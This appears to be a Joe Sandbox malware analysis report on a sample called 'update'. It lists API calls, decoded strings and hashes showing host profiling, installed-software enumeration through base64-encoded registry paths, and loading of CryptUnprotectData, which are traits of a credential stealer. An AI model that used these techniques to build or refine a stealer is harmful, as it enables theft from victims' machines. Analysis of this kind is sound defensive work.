                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980
                                                                                                            • Opcode ID: 8b00b84aa516fba5c77c63446095be8e0015e5adddf6cbf02c21b266f47d11b6
                                                                                                            • Instruction ID: 17a9d3f9dada47cc9ac8d1119a6a539bb1925bf71553c9b7a2c2a659eb457ae7
                                                                                                            • Opcode Fuzzy Hash: 8b00b84aa516fba5c77c63446095be8e0015e5adddf6cbf02c21b266f47d11b6
                                                                                                            • Instruction Fuzzy Hash: FA712D70A00109ABDB01FFD1DC42FCDBB7AEF48309F61803BB104766D6D679EA458A59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                            • RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                            • 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                            • RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 004075C0: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 00407669
                                                                                                              • Part of subcall function 004075C0: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407642
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumFreeString$OpenQueryValue
                                                                                                            • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                            • API String ID: 966536320-3013244427
                                                                                                            • Opcode ID: 7694ff6ecba141d5634b4c9bf58c222ea5cc4a5b985b10ce1cd110ff279199a6
                                                                                                            • Instruction ID: c01df635abeadf6e6837e62572b2515f3de099e5a3d6091bc8c8e2951dea1457
                                                                                                            • Opcode Fuzzy Hash: 7694ff6ecba141d5634b4c9bf58c222ea5cc4a5b985b10ce1cd110ff279199a6
                                                                                                            • Instruction Fuzzy Hash: 94C1F5B5A001189BCB11EB55CC41BCEB7BDAB84305F5045FBB608B7282DA78AF858F5D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: e4a77ee3253fb861a4c2a3d02493cf06135ca903ff001f43c894796c4b44ff40
                                                                                                            • Instruction ID: b8e48139218345cad2f297104021fa64e6aa48652e620d0ceae34b43c4c0af77
                                                                                                            • Opcode Fuzzy Hash: e4a77ee3253fb861a4c2a3d02493cf06135ca903ff001f43c894796c4b44ff40
                                                                                                            • Instruction Fuzzy Hash: 2F41F131A00108ABCB01EFD1D842BCDBFB9EF48305F51813BF504B7296D678EA4A8B59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: a50302f3335d6827af2569a25b070775da19efb5e4b884c8418ec27caf2cea0b
                                                                                                            • Instruction ID: e4b56cc851b103c0b6e82843fe8d158378310d0a6374bcefbca3464089aad580
                                                                                                            • Opcode Fuzzy Hash: a50302f3335d6827af2569a25b070775da19efb5e4b884c8418ec27caf2cea0b
                                                                                                            • Instruction Fuzzy Hash: 0241E271A00109ABCB01EFD1D842FCDBBB9EF48305F51413BF504B7296D679EA468B59
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: 0398860f2ddb89eef45c93336f1e12b903fa87197691463d16a48df23a7f1d2e
                                                                                                            • Instruction ID: 5334f543f3cde4c82855e693d3a9c32584cc6d37095a220752bcfb437b19b81d
                                                                                                            • Opcode Fuzzy Hash: 0398860f2ddb89eef45c93336f1e12b903fa87197691463d16a48df23a7f1d2e
                                                                                                            • Instruction Fuzzy Hash: D741E071A00109ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA4A8B59
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000000,kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CEE
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeGlobalLibraryLoadMemoryProcStatusString
                                                                                                            • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                            • API String ID: 420089832-3878206809
                                                                                                            • Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                                                                                                            • Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
                                                                                                            • Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                                                                                                            • Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3782394904-0
                                                                                                            • Opcode ID: 3ae4e2a3c02261fdbe57f5221ce4753408be8e9cd2f32c29f7b24f8f8c54b4ed
                                                                                                            • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                            • Opcode Fuzzy Hash: 3ae4e2a3c02261fdbe57f5221ce4753408be8e9cd2f32c29f7b24f8f8c54b4ed
                                                                                                            • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000800), ref: 00600150
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00600158
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID: ickCount$ntdll$user32
                                                                                                            • API String ID: 2340568224-1695552900
                                                                                                            • Opcode ID: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction ID: f9b99d4eb2402756737a400f327a5e71f55e4e3b6b46edefd89ef36a9cc23b9c
                                                                                                            • Opcode Fuzzy Hash: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction Fuzzy Hash: 31112B319C41879FDF2E5EA2467E3EB2727BF11300F2484C9B916091D6CA704E065A5E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
                                                                                                            • RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
                                                                                                            • RegCloseKey.KERNEL32(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 00406C60
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
                                                                                                            • ProductName, xrefs: 00406C2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocCloseCreateQueryStringValue
                                                                                                            • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 3260168215-1787575317
                                                                                                            • Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                                                                                            • Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
                                                                                                            • Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                                                                                            • Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(000000FF,00000000,04000000,00003000,00000040,00000000), ref: 0060029A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Pj@h$ntdll$user32
                                                                                                            • API String ID: 4275171209-2607519978
                                                                                                            • Opcode ID: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction ID: dca23c05d3c367be35d89396e2e931ccc0476e677226a6eb13f9e47f75c24404
                                                                                                            • Opcode Fuzzy Hash: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction Fuzzy Hash: 51F027346C8282ADFB794B714C2A7EB6F529F02310F24C59AA5D0891C5D970A90A6758
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
                                                                                                            • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: CryptUnprotectData$crypt32.dll
                                                                                                            • API String ID: 2574300362-1827663648
                                                                                                            • Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                                                                                                            • Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
                                                                                                            • Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                                                                                                            • Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 730355536-0
                                                                                                            • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                            • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                            • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                            • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                            APIs
                                                                                                            • VirtualProtectEx.KERNEL32(000000FF,?,?,?), ref: 00600E1B
                                                                                                            • VirtualProtectEx.KERNEL32(000000FF,?,?,00000002,?), ref: 00600E47
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID: jjj
                                                                                                            • API String ID: 544645111-2289343631
                                                                                                            • Opcode ID: 24ee2e3d089a4123137fec0d63f5aa274cdf28bd72bc079d480bb61aa69dcfdb
                                                                                                            • Instruction ID: e366e1409ee1fa5a5f821a9877603b5f9982b986e126c00f549b2b56891f5eda
                                                                                                            • Opcode Fuzzy Hash: 24ee2e3d089a4123137fec0d63f5aa274cdf28bd72bc079d480bb61aa69dcfdb
                                                                                                            • Instruction Fuzzy Hash: FA215C71740611AFE7589F18CC85F96B7A5FF48320F298228E969973D1DA34A8118BD4
                                                                                                            APIs
                                                                                                            • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407DA8
                                                                                                            • FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 1602037265-0
                                                                                                            • Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                                                                                            • Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
                                                                                                            • Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                                                                                            • Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000004,0060075E,00603274), ref: 00602449
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Hrw.
                                                                                                            • API String ID: 4275171209-2486825230
                                                                                                            • Opcode ID: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction ID: f810dedf99d5b0aae3d782746b9875fda20748e19ad253c0f87b71218621f5fc
                                                                                                            • Opcode Fuzzy Hash: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction Fuzzy Hash: 8FE092F28893C49FDF664F108C957C83B61BF1A355F140186DE988A2D2D2700A01CB25
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeInformationStringTimeZone
                                                                                                            • String ID: UTC+
                                                                                                            • API String ID: 3683333525-3251258214
                                                                                                            • Opcode ID: 75489bee9fa3b738de1427028be95b4ab5cbd00bc7b029fff02a4e26b45979e0
                                                                                                            • Instruction ID: 38205c10b50273b6ed0f177ed7b00506e95897eba74a112c127affbdf728c15b
                                                                                                            • Opcode Fuzzy Hash: 75489bee9fa3b738de1427028be95b4ab5cbd00bc7b029fff02a4e26b45979e0
                                                                                                            • Instruction Fuzzy Hash: FB215170B047149FDB55DB698C41B9AB6FA9B8D300F1181B9B50CE3292D7389E458A16
                                                                                                            APIs
                                                                                                            • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Cryptography, xrefs: 0040415D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
